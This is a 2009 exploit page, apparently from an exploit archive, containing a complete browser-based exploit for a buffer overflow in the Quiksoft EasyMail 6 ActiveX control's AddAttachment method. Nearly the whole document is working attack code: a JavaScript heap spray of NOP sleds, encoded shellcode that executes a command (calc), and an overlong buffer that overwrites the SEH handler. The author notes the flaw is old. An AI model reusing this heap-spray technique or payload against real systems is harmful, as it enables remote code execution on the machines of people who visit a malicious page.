Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit
Source: www.bmgsec.com.au Author: bmgsec Published: 2009-09-18

<html>
 <head>
    <!--
      -- Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit
      --
      -- It's old and the latest version doesn't support this method.
      -- I was bored and a similar post sparked my interest.
      --
      -- Advisory: http://www.bmgsec.com.au/advisory/48/
      --
      -- Written by:
      -- bmgsec (bmgsec [at] gmail.com / www.bmgsec.com.au)
      --  -->
 <title>Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit</title>
<object classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9' id='test'></object>
<script language='javascript'>
       function str_repeat ( input, multiplier ) {
               return new Array(multiplier+1).join(input);
       }

       //windows/exec CMD: calc Size: 144 bytes Encoder: x86/shikata_ga_nai ExitFunc: SEH
       shellcode = unescape("%uc931%u1eb1%ue2b8%udc1f%ud9cc%ud9e5%u2474%u5bf4%u4331%u830f%ufceb"+
                            "%u4303%ufde9%u3029%u4505%uc9d2%ucdd5%uf597%uad5e%u7e12%ua161%u3196"+
                            "%ub679%uedf6%u2378%u6541%u384e%u9753%ufe9f%ucbcd%u3e5b%u1499%u75a2"+
                            "%u1a6f%u61e6%u2784%u51b2%u2d61%u11df%ue936%ucd1e%u7aaf%u5a2c%u22bb"+
                            "%u5d30%u5750%ud654%u83a7%ub4ed%u5783%u1b2e%ua1fd%uf2d0%uc699%ucb56"+
                            "%u99ea%ua05a%u059d%u3dcf%u3e35%uba86%ufe45%u6af2%u0f22%u8f88%u87ed"+
                            "%u7114%u569b%u7173%u057b%ue11a%ucae7");

       bigblock = unescape("%u9090%u9090");
       headersize = 20;
       slackspace = headersize + shellcode.length;

       while (bigblock.length < slackspace)
               bigblock += bigblock;

       fillblock = bigblock.substring(0, slackspace);
       block = bigblock.substring(0, bigblock.length - slackspace);

       while (block.length + slackspace < 200000)
               block = block + block + fillblock;

       memory = new Array();
       for (i=0; i<500; i++)
               memory[i] = block + shellcode;

       buffer = str_repeat('A', 433);
       buffer += "BBBB";
       buffer += str_repeat(unescape("%0b%0b%0b%0b"), 63);

       test.AddAttachment(buffer, 1);
</script>
</head>
</html>


 